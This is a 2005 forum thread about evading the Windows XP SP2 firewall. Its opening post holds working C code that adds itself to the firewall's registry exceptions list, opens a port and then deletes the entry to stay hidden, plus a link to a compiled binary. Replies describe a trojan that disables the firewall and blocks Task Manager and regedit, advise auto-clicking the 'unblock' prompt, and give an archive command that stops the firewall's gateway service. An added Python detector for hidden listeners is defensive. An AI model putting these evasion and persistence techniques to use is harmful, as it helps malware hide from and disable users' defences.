SP2 Firewall

Started by iago, September 08, 2005, 09:49:41 AM


iago

This article is about how to open up a listening port from Windows XP SP2 without being logged/listed as open:

Quote
1.9.2005
Mark Kica
crusoe@alexandria.cc
FEI AI Technical University Kosice
#Dedicated to Katka H. from Levoca



     How to avoid detection of a server application by the Windows XP SP2 firewall

###############################################################################
#Q:How safe is Windows XP SP2 firewall ?
#A:Not very...

This trick uses only modification of registry keys. The Windows XP SP2 firewall has a
list of allowed programs in the registry which are not blocked. If you add a new key
to it, your server (malware or trojan) can run freely.

The server can also be invisible in the following list:

start->control panel->windows firewall->exceptions


It will become invisible from this list because after you create the socket, you can remove the registry string value of your server and the connection won't be aborted.

The other way to bypass the SP2 firewall is to create the trojan not as a server, but
as a client.

##################################################################

http://taekwondo-itf.szm.sk/bugg.zip

Test:

#c:\bugg.exe          Server running on port 2001

connect to the server with:

#telnet localhost 2001



##################################################################

Our registry path is

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


and there you can create a string value:

Value name        Value
C:\chat.exe       C:\chat.exe:*:Enabled:chat


NO SPACES!!! in the key name etc.  _C:\chat.exe___

#################################################################
Tested on Windows XP Media Center Edition 2005 with integrated SP2

Source code
(the server uses the ezsocket lib)

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

int main(int argc, char *argv[])
{
    char buffer[1024];
    char filename[1024];
    char rule[1024];      /* the allow-list value: "<path>:*:Enabled:bugg" */
    HKEY hKey;
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    /* Full path of this executable; it is both the value name and the start of the value. */
    GetModuleFileName(NULL, filename, sizeof(filename));

    strcpy(rule, filename);
    strcat(rule, ":*:Enabled:");
    strcat(rule, "bugg");

    /* Open the SP2 firewall's exceptions list (needs administrative rights). */
    if (RegOpenKeyEx(
            HKEY_LOCAL_MACHINE,
            "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
            0,
            KEY_ALL_ACCESS,
            &hKey) != ERROR_SUCCESS)
    {
        fprintf(stderr, "cannot open the firewall exceptions key\n");
        return 1;
    }

    /* Add this program to the exceptions list before the port is bound. */
    RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)rule, (DWORD)strlen(rule) + 1);

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick    \n");
    fprintf(stdout, "             This is not trojan                       \n");
    fprintf(stdout, "             Opened port is :2001                      \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca                       \n");

    Sleep(3000);   /* Win32 Sleep() takes milliseconds (the original called POSIX sleep(3)) */

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
    {
        RegCloseKey(hKey);
        return 0;
    }

    for (;;)
    {
        /* The socket is already bound, so the entry can go: the listener keeps
           working but no longer shows up under Windows Firewall -> Exceptions. */
        RegDeleteValue(hKey, filename);
        fd_size = sizeof(struct sockaddr_in);

        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
        {
            perror("accept");
            continue;
        }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sent: Hello World\r\n");
        temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);
        if (temp < 0)
            temp = 0;             /* recv() returns -1 on error; never index with it */
        buffer[temp] = '\0';
        fprintf(stdout, "Received: %s\r\n", buffer);
        ezclose_socket(new_fd);
        /* Re-add the entry while idle (the original wrote the received data here instead of the rule). */
        RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)rule, (DWORD)strlen(rule) + 1);

        if (!strcmp(buffer, "quit"))
            break;
    }

    RegCloseKey(hKey);
    ezsocket_exit();
    return 0;
}
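A defender-side check for the trick above, as an added example that is not part of the original post or of Mark Kica's code: it cross-references LISTENING sockets (rows in the format of `netstat -ano`) against the AuthorizedApplications\List values, so a server that deleted its own entry right after binding its port still stands out. The netstat text, the PID-to-image map and the registry values are constructed sample data.

```python
import re
from typing import NamedTuple

# One LISTENING row of `netstat -ano`: proto, local addr:port, foreign addr, state, PID.
NETSTAT_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$", re.M)

class AllowEntry(NamedTuple):
    path: str      # image path the entry covers, lower-cased for matching
    scope: str     # "*" means any remote address
    enabled: bool
    name: str

def parse_allow_value(value: str) -> AllowEntry:
    # Value format "<path>:<scope>:<Enabled|Disabled>:<name>". The path itself holds a
    # drive colon, so split from the right to keep "C:\chat.exe" in one piece.
    path, scope, state, name = value.rsplit(":", 3)
    return AllowEntry(path.lower(), scope, state.lower() == "enabled", name)

def parse_netstat(text: str):
    """Yield (local_addr, port, pid) for each LISTENING TCP row."""
    for addr, port, pid in NETSTAT_LINE.findall(text):
        yield addr, int(port), int(pid)

def find_unlisted_listeners(netstat_text, pid_to_image, allow_values):
    """Return [(port, image, reason)] for listeners the exceptions list does not cover."""
    allow = {e.path: e for e in map(parse_allow_value, allow_values.values())}
    findings = []
    for addr, port, pid in parse_netstat(netstat_text):
        if addr.startswith("127."):
            continue                      # loopback-only: not reachable from the network
        image = pid_to_image.get(pid, "<unknown pid %d>" % pid).lower()
        entry = allow.get(image)
        if entry is None:
            findings.append((port, image, "no AuthorizedApplications entry"))
        elif not entry.enabled:
            findings.append((port, image, "entry present but Disabled"))
    return findings

# Constructed sample data standing in for `netstat -ano`, a PID-to-image map (as from
# tasklist) and the List key's name/value pairs; bugg.exe has no entry any more.
SAMPLE_NETSTAT = """
  TCP    0.0.0.0:2001           0.0.0.0:0              LISTENING       1532
  TCP    0.0.0.0:3000           0.0.0.0:0              LISTENING       1100
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING       1201
"""
SAMPLE_PIDS = {1532: r"C:\bugg.exe", 1100: r"C:\chat.exe", 1201: r"C:\local.exe"}
SAMPLE_ALLOW = {r"C:\chat.exe": r"C:\chat.exe:*:Enabled:chat"}

if __name__ == "__main__":
    for port, image, reason in find_unlisted_listeners(SAMPLE_NETSTAT, SAMPLE_PIDS, SAMPLE_ALLOW):
        print(f"port {port} {image}: {reason}")
```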
 

Quik

Thanks, was looking for some information on SP2's firewall recently.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Joe

Heh, I wouldn't trust the XP firewall anymore than my headphones, even before this.
Quote from: Camel on June 09, 2009, 04:12:23 PM
I'd personally do as Joe suggests

Quote from: AntiVirus on October 19, 2010, 02:36:52 PM
You might be right about that, Joe.


Koga73

I made a trojan, and to prevent the XP SP2 firewall from doing anything... I just blocked the window name "windows security alert" so it won't display that stupid message. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan I have set by default to block task manager, msconfig, regedit, and windows security alert. So, once it's on, it's not ez to get off :). And the user can add their own blocks if they want.

Newby

Uh, it will not display the message, but I'm guessing that it will still block access.

You should set a loop to detect that window popping up, and when it does, find the button that says "unblock" and unblock your program from accessing the internet.
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

Quote from: Rule on June 30, 2008, 01:13:20 PM
Quote from: CrAz3D on June 30, 2008, 10:38:22 AM
I'd bet that you're currently bloated like a water balloon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Sidoh

Quote from: Koga73 on September 14, 2005, 10:32:51 PM
I made a trojan, and to prevent the XP SP2 firewall from doing anything... I just blocked the window name "windows security alert" so it won't display that stupid message. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan I have set by default to block task manager, msconfig, regedit, and windows security alert. So, once it's on, it's not ez to get off :). And the user can add their own blocks if they want.

How incredibly annoying.  People who program maliciously suck at life.

Koga73

When the window closes, it doesn't block it, or permanently allow it. It just allows it that time, and next time it'll ask you again.

Joe

Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.


Screenor

Quote from: Joe[e2] on September 15, 2005, 10:48:06 PM
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.
Seriously, other than not letting you host games on B.net it's really got no purpose.

iago

It blocks incoming traffic.  That will stop a lot of attacks, such as:
MS03-026 (Dcom -- Blaster worm)
MS04-011 (Lsass -- Sasser worm)
MS05-039 (PnP -- Zotob worm)
and many others. 

It's useful for preventing incoming attacks, like worms, but isn't terribly useful for blocking outbound traffic.

drka

Windows Vista is supposed to have its firewall upgraded so that it does

Quik

Quote from: Mangix on September 25, 2005, 08:28:15 PM
Windows Vista is supposed to have its firewall upgraded so that it does

It does what? A dance? Blocks Sasser? Damn, it better.

drka

blocking outgoing connections and maybe will fix the issue where malware can disable it

iago

Quote from: Mangix on September 25, 2005, 08:47:31 PM
blocking outgoing connections and maybe will fix the issue where malware can disable it

As long as the user can disable it without a password, so can viruses.  And people don't like having to put in a password, so that probably won't change. 

ink

The XP firewall is easily disabled with an archivirus (SFX scripting);
all you have to do is set it to run this before extraction:

C:\Windows\system32\net.exe stop alg

This command will shut down the "Application Layer Gateway Service", which is responsible for the correct functionality of the firewall.